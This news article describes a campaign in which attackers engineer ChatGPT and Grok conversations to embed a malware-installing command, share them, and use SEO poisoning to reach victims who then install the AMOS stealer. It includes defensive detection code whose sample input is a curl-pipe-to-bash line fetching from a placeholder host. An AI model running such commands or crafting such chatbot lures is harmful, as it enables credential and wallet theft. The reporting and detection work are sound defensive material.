A new attack uses SEO poisoning and popular AI models to deliver infostealer malware, all while leveraging legitimate domains.
ClickFix attacks have gained significant popularity over the past year, using benign-looking CAPTCHA-style prompts to lull users into a false sense of security and then tricking them into executing malicious commands against themselves. These lures are often delivered through SEO poisoning and phishing campaigns, representing one of the fancier applications of social engineering in cybercrime to date.
Huntress researchers Stuart Ashenbrenner and Jonathan Semon detailed a new take on this kind of attack, where an unknowing user Googles a problem they want to solve, such as cleaning their hard drive. Huntress found that for some searches, first-page results would include legitimate ChatGPT and Grok links referencing the user's request.
The user clicks on the result and is taken to a conversation with a large language model (LLM), where they are given instructions on how to, for example, clear disk space on macOS. What looks like straightforward advice, however, actually asks the user to run a terminal command that communicates with an attacker-controlled server and installs infostealer malware, in this case the macOS stealer AMOS. This is exactly what happened to a Huntress customer on Dec. 5.
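The exact command from this campaign isn't reproduced here, but ClickFix lures tend to share a recognizable shape: fetch a script from a remote server and pipe it straight into a shell, or decode and run an embedded payload. The short Python sketch below flags pasted commands that match those shapes; the patterns are illustrative assumptions, not indicators taken from the Huntress report.

```python
import re

# Assumed command shapes commonly seen in ClickFix-style lures;
# these are illustrative, not indicators published by Huntress.
CLICKFIX_PATTERNS = [
    re.compile(r"curl\s+[^|;]*\|\s*(?:ba|z)?sh"),       # curl ... | sh
    re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|"),   # decode-and-pipe
    re.compile(r"osascript\s+-e\s"),                    # inline AppleScript
]

def looks_like_clickfix(command: str) -> bool:
    """Return True if a pasted command matches a known lure shape."""
    return any(p.search(command) for p in CLICKFIX_PATTERNS)

if __name__ == "__main__":
    sample = "curl -fsSL http://example.invalid/clean.sh | bash"
    print(looks_like_clickfix(sample))  # True
```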
This attack plays off the trust that users have (earned or unearned) in AI chatbots as well as whatever trust the attacker might be able to leverage out of a popular LLM brand.
Abusing Trust in AI for ClickFix-Style Attacks
According to Huntress’s blog post, the customer "believed they were following advice from a trusted AI assistant, delivered through a legitimate platform, surfaced by a search engine they use every day."
"Instead, they had just executed a command that downloaded an AMOS stealer variant that silently harvested their password, escalated to root, and deployed persistent malware," Ashenbrenner and Semon wrote. "No malicious download. No security warnings. No bypassing macOS’s built-in protections. Just a search, a click, and a copy-paste, into a full-blown persistent data leak."
While many social engineering campaigns leverage fake or copycat sites or a slightly misspelled email address to deliver malware, this campaign uses the actual AI and search platforms with a little bit of SEO poisoning to get victims to infect themselves.
Semon, who is principal SOC analyst at Huntress, tells Dark Reading that the attacker generates the link by engineering the LLM prompt to look like legitimate troubleshooting (while embedding the malicious command) and then creating a URL through the AI platform's share feature. The malicious conversation is then shared across content farms, forums, Telegram channels, and low-quality indexed sites in order "to artificially inflate backlink relevance for troubleshooting keywords."
In this attack, the chat conversations deliver AMOS, data-stealing macOS malware that persists on the system and harvests targeted data such as cryptocurrency wallets, keychain contents, browser credentials, and more.
Defending Against ClickFix-Style AI Attacks
Semon tells Dark Reading he believes "this tactic could become a dominant initial access method for stealers and other families of malware over the next six to 18 months, especially for credential theft, wallet hijacking, and Trojanized commands, across both Windows and macOS."
There are many different ways to approach this threat. Most directly, because the infection vector looks like legitimate activity (a ChatGPT prompt), Huntress advises defenders to focus on behavioral anomalies, such as osascript, a macOS command-line utility, prompting users for credentials, or hidden executables appearing in users' home directories.
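What hunting for those two behaviors might look like on a single macOS endpoint is sketched below in Python. The heuristics, an osascript process displaying a "hidden answer" password dialog and hidden files with the execute bit set under a home directory, are assumptions for illustration, not Huntress's published detection logic.

```python
import os
import stat
import subprocess

def suspicious_osascript() -> list[str]:
    # List running processes; osascript invoking 'display dialog ...
    # with hidden answer' is a common way macOS malware phishes for
    # the user's login password.
    ps = subprocess.run(["ps", "axo", "command"],
                        capture_output=True, text=True, check=True)
    return [line for line in ps.stdout.splitlines()
            if "osascript" in line and "hidden answer" in line]

def hidden_executables(home: str) -> list[str]:
    # Walk the home directory for dot-files with the execute bit set,
    # a simple proxy for hidden payloads dropped by a stealer.
    hits = []
    for root, _dirs, files in os.walk(home):
        for name in files:
            if not name.startswith("."):
                continue
            path = os.path.join(root, name)
            try:
                mode = os.stat(path).st_mode
            except OSError:
                continue
            if mode & stat.S_IXUSR:
                hits.append(path)
    return hits

if __name__ == "__main__":
    for hit in suspicious_osascript():
        print("[osascript] ", hit)
    for hit in hidden_executables(os.path.expanduser("~")):
        print("[hidden exe]", hit)
```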
For end users, the advice is simple: don't execute terminal commands from unfamiliar sources, and practice strong password hygiene, such as long, random passwords and a password manager to keep accounts secure. Also, although this attack is a bit of a unique case, it serves as a reminder to think critically before taking an AI output as actionable truth.
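As a small, concrete illustration of that hygiene, a long random password can be generated with Python's standard secrets module; the 24-character length here is an arbitrary choice for the example.

```python
import secrets
import string

# Characters drawn from letters, digits, and punctuation.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

def random_password(length: int = 24) -> str:
    # secrets uses a cryptographically strong random source,
    # unlike the random module.
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

if __name__ == "__main__":
    print(random_password())
```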
"Traditional malware delivery battles against instinct. Phishing emails feel suspicious. Cracked installers trigger warnings. But copying a Terminal command from our trusted AI friend ChatGPT? That feels productive. That feels safe. That feels like a simple solution to an annoying problem," the blog post read. "This strategy is a breakthrough, as attackers have discovered a delivery channel that not only bypasses security controls but also circumvents the human threat model entirely."
About the Author
Senior News Writer, Dark Reading
Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.